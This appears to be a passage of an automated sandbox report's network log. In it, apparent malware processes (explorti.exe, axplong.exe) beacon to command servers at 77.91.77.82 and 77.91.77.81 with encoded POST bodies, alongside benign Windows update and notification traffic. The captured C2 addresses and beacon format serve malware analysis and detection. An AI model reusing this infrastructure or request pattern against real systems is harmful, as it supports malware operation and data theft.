                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        145192.168.2.64998877.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:21.729006052 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:22.458756924 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        146192.168.2.64998977.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:21.772773981 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:22.489975929 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        147192.168.2.64999077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:22.506010056 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:23.677259922 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:23 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0
                                                                                        Jul 24, 2024 07:16:23.679219961 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:23 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0
                                                                                        Jul 24, 2024 07:16:23.681538105 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:23 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        148192.168.2.64999177.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:23.682183027 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:24.454881907 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        149192.168.2.64999277.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:23.793596983 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:24.495457888 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        0192.168.2.64971040.115.3.253443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:06 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 55 39 43 43 57 54 4b 45 6a 45 61 72 4d 6c 79 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 65 33 66 37 39 65 35 39 37 66 33 39 36 66 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 304MS-CV: U9CCWTKEjEarMlyL.1Context: 6e3f79e597f396f
                                                                                        2024-07-24 05:14:06 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:14:06 UTC1063OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 30 0d 0a 4d 53 2d 43 56 3a 20 55 39 43 43 57 54 4b 45 6a 45 61 72 4d 6c 79 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 65 33 66 37 39 65 35 39 37 66 33 39 36 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73 33
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1040MS-CV: U9CCWTKEjEarMlyL.2Context: 6e3f79e597f396f<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps3
                                                                                        2024-07-24 05:14:06 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 55 39 43 43 57 54 4b 45 6a 45 61 72 4d 6c 79 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 65 33 66 37 39 65 35 39 37 66 33 39 36 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 196MS-CV: U9CCWTKEjEarMlyL.3Context: 6e3f79e597f396f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:14:06 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:14:06 UTC58INData Raw: 4d 53 2d 43 56 3a 20 46 32 6d 7a 30 41 2b 63 34 30 47 36 33 2f 49 42 58 76 51 35 33 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: F2mz0A+c40G63/IBXvQ53w.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        1192.168.2.64971240.115.3.253443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:14 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2f 59 58 73 6a 2f 77 41 32 55 69 51 4b 44 57 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 36 66 65 33 33 64 33 34 34 62 61 32 63 64 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: /YXsj/wA2UiQKDWl.1Context: a46fe33d344ba2cd
                                                                                        2024-07-24 05:14:14 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:14:14 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 2f 59 58 73 6a 2f 77 41 32 55 69 51 4b 44 57 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 36 66 65 33 33 64 33 34 34 62 61 32 63 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: /YXsj/wA2UiQKDWl.2Context: a46fe33d344ba2cd<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:14:14 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2f 59 58 73 6a 2f 77 41 32 55 69 51 4b 44 57 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 36 66 65 33 33 64 33 34 34 62 61 32 63 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: /YXsj/wA2UiQKDWl.3Context: a46fe33d344ba2cd<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:14:14 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:14:14 UTC58INData Raw: 4d 53 2d 43 56 3a 20 71 77 6f 33 4e 53 2b 39 74 30 57 59 54 6c 6a 69 66 71 47 71 73 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: qwo3NS+9t0WYTljifqGqsg.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.64971313.85.23.86443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:19 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Kvu6flRNlG2X2Hs&MD=Y7YGDEsS HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                        Host: slscr.update.microsoft.com
                                                                                        2024-07-24 05:14:19 UTC560INHTTP/1.1 200 OK
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Content-Type: application/octet-stream
                                                                                        Expires: -1
                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                        MS-CorrelationId: c2007af1-07c3-44c5-b42d-50d33e712dd3
                                                                                        MS-RequestId: 02ae7e21-6c0e-4ed9-b059-01bf4c0b1850
                                                                                        MS-CV: MAElUP0fm0OTle8k.0
                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Wed, 24 Jul 2024 05:14:18 GMT
                                                                                        Connection: close
                                                                                        Content-Length: 24490
                                                                                        2024-07-24 05:14:19 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                        2024-07-24 05:14:19 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        3192.168.2.64971940.115.3.253443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 4c 6f 77 4c 35 4c 2b 6a 45 36 52 6a 41 6d 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 31 32 38 36 61 62 31 34 38 61 36 35 38 64 36 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: sLowL5L+jE6RjAmc.1Context: 71286ab148a658d6
                                                                                        2024-07-24 05:14:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:14:26 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 73 4c 6f 77 4c 35 4c 2b 6a 45 36 52 6a 41 6d 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 31 32 38 36 61 62 31 34 38 61 36 35 38 64 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: sLowL5L+jE6RjAmc.2Context: 71286ab148a658d6<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:14:26 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 4c 6f 77 4c 35 4c 2b 6a 45 36 52 6a 41 6d 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 31 32 38 36 61 62 31 34 38 61 36 35 38 64 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: sLowL5L+jE6RjAmc.3Context: 71286ab148a658d6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:14:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
